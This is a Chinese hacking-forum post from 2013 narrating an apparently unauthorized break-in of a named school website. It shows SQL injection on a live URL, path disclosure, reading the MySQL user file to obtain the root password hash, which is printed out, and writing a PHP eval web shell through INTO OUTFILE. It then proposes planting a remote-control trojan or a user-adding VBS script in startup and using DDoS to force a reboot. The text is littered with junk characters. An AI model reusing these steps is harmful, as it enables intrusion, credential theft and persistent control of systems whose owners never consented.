找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2650|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏2 O4 ^% B) W/ M% Z9 J/ c* j
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!0 \6 S- d/ K6 a7 a' k1 B1 U
* o  \0 Q! [- `& s0 a. `
& J* k. @2 U7 P* w  {' I

" G/ @; m* V' f8 R& R; ^常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 ; X# f/ s* t# l7 e: _) e% i

+ _  A0 C% Y# P* o1 F2 J那么想可以直接写入shell ,getshell有几个条件:
% k8 }+ `( F" O3 y7 u" n
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF! [  `0 B7 i+ h/ _6 @& P: ?/ ?

% n. S5 n# ^/ \# p+ t试着爆绝对路径:
) o: B% Y& D  [+ n* D# T9 u1./phpMyAdmin/index.php?lang[]=1  
7 M6 J$ k$ `+ p% L2./phpMyAdmin/phpinfo.php  ; }5 o2 k# G  n7 O  J
3./load_file()  
7 j, W0 d( l8 j' d  L0 x; k4./phpmyadmin/themes/darkblue_orange/layout.inc.php  & p; Q0 s" B" D& k# e5 ~
5./phpmyadmin/libraries/select_lang.lib.php  , J) T$ ]9 w4 V7 X/ ^/ X" O
6./phpmyadmin/libraries/lect_lang.lib.php  4 F0 ]  q. R+ ^( c+ e
7./phpmyadmin/libraries/mcrypt.lib.php   ( e" A/ p$ _& _( Z8 e- V
8./phpmyadmin/libraries/export/xls.php  % B- t1 R8 g8 v, n  z. B4 p
4 z0 E* p* j1 q: V" y3 |7 c* P
均不行..........................., H( d, A; y$ Q, U9 r0 r6 Q4 D

& y" D, {+ T( O; R2 W御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php( [, l+ _9 c5 q* ~# T; k% X7 F

9 z! F0 j2 C) v4 f- ^: d权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
0 ^2 F$ y( v- v, l- G' t# q
2 _$ |: L6 t  P7 r默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败- S4 y4 o/ g5 Y

) c1 T0 A2 D; K7 o1 Y敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........5 L7 l, u. w1 w, H
& w* N, e9 d7 [+ ?( P7 B$ f, t
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell + ^5 O- C3 K; I. g. _2 ]- ?

0 S+ p$ k  {1 G/ s0 C% ghttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini ' ^: i: R& J- J  P4 \# k
& [: `! S8 M1 F; G* Z8 V
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 4 j* T9 B+ X- |% i6 [

2 b6 ^& E1 n, ?; k5 Q# d) G成功读到root密码:5 `( ?& I# J6 ]2 r: C
' q! W2 I# o! X( m7 B
17---- r(0072)
' r- W; c/ }) c  V* p* L; q18---- o(006f)
* y8 p% b. ^7 b6 E9 |( M19---- o(006f)
, H$ s& `/ x! y" ^20---- t(0074)
1 Y0 I* i5 r1 O2 C, t" N: G/ R21---- *(002a)6 m+ B3 W& S! \% J# ]
22---- 8(0038)
2 U$ u' q8 S) L23---- 2(0032)* v  ]8 S8 n  ]: m
24---- E(0045)$ j! Z; o! t3 F/ L  F
25---- 1(0031), S; ^" U- H  I- K% r+ X# O
26---- C(0043)" m5 Y+ h; d, }8 A2 I* S
27---- 5(0035)$ R$ z. R$ v3 q- E! i( U- O2 A7 Z
28---- 8(0038)5 }4 A7 }& J8 Q# u* o' Z# ]+ p
29---- 2(0032)
/ P- o: H1 W/ W1 |30---- 8(0038)
/ n7 ^) Q; U/ C1 }2 Q3 O6 c$ c. l3 a31---- A(0041)
- A' j1 F3 a* R/ h7 R8 G+ n8 k0 D32---- 9(0039)
8 X  z$ V% w9 ~- O33---- B(0042)
- g6 n6 {4 Q( w4 Q, P% {+ z8 `34---- 5(0035)
) m. o* e% ^# o0 H) k; ~' ~35---- 4(0034)% l( b- I/ _# j4 w: l
36---- 8(0038)* h( F2 N8 q1 n% E  K2 f5 F3 y
37---- 6(0036)+ V( G+ x* k4 n3 N
38---- 4(0034). d6 A, f+ n+ e! o
39---- 9(0039)$ ?6 C/ A# a% T1 U
40---- 1(0031)
8 R2 @0 P* }% Y% h+ |" N! l41---- 1(0031)2 c+ B, k& l- [- r& ]3 ^! \2 V
42---- 5(0035)
# Z$ k7 Y" Z- _5 d4 N6 T43---- 3(0033)5 t3 u5 P0 @( Y6 Q8 j' a
44---- 5(0035)
, i3 z# z; B1 I45---- 9(0039)
* [- P$ I  K7 O0 H  U( Q46---- 8(0038)" I- C1 I1 c) q0 u, S" a9 r, T
47---- F(0046)
3 K1 F& l9 B. m: V48---- F(0046)
! e' I* d! J) x! m/ K+ u49---- 4(0034)! Q7 `+ w7 t4 b8 v% F6 z1 w4 I
50---- F(0046)  R3 V& r4 g- A
51---- 0(0030)
* Q- g  |5 t: v52---- 3(0033)4 w9 h* ^, Z) a) S
53---- 2(0032)+ B" T6 m! A1 o4 {
54---- A(0041): o3 P3 N) ~6 Q9 ~# \& `  l
55---- 4(0034)
, y/ d: O) s. V  p2 k( q56---- A(0041)
) X( h$ Z$ C  @4 F1 a; R" {9 ^/ {57---- B(0042)  v6 }  Z: }+ y9 d* t% ?6 I
58---- *(0044)
9 ~# H* k/ _+ y. j/ _! t* Q. _! ]% u59---- *(0035)1 _1 ~( c" H' U8 d3 I, _. N" L
60---- *(0041)
3 O3 ~: o0 E8 ~+ V61---- *0032)% Q* ^7 X7 ^; P% M% o" M

. \+ }6 b6 z; c2 v解密后成功登陆phpmyamin( y, D. ~! `/ q% p) s  U
                          
9 F' |1 `5 c( h' j. N; }
  [- r# h4 N- o: w                             
  r" F+ c- s. ]: b0 L: V( a
$ g9 E* q: z, Y6 Q找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
/ B; l6 Q5 ~" F! j# x/ [) N" v# ~" v0 h  v+ U
成功执行,拿下shell,菜刀连接:
& ]! f4 R8 f0 ^* z7 @. K5 d* s' J7 \7 w( }
服务器不支持asp,aspx,php提权无果...................# ~) F" ]: V0 |7 g4 a
9 d" Y6 H* V4 f4 j8 h' H, t+ o  S
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
+ N8 r1 t5 ^( v. Y" B3 ?- O
服务器上已经有个隐藏帐号了
1 B8 Y  M* @9 T5 ]& L) u
别名     administrators  [: _, r, |6 B3 t1 C7 g
注释     管理员对计算机/域有不受限制的完全访问权

  h0 i# V& L$ S5 d1 G' a
成员
6 A4 H  T4 \0 q* k3 q; O2 C
-------------------------------------------------------------------------------& w4 @8 L7 H4 f6 D
admin
0 K  y: c; W" ^* n/ m. `Administrator2 ^0 l2 K! X4 W# m/ H3 P" V
slipper$3 F8 A3 W' x& \% B5 X
sqluser3 c$ V7 a3 P8 H: b6 S, R' @
命令成功完成。 , ~+ h4 G9 e8 e- @5 \/ @. O( H

. |. O# O  ]! x" d2 K; s1 {服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。* e9 C* ~1 [! i: P) {

: {% ~5 o* ?9 l  m& }8 fddos服务器重启,不然就只能坐等服务器重启了...............................
* _, s! t& P' [; J3 e/ H  N$ I9 `5 D
      

$ n* T# j8 P, [

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表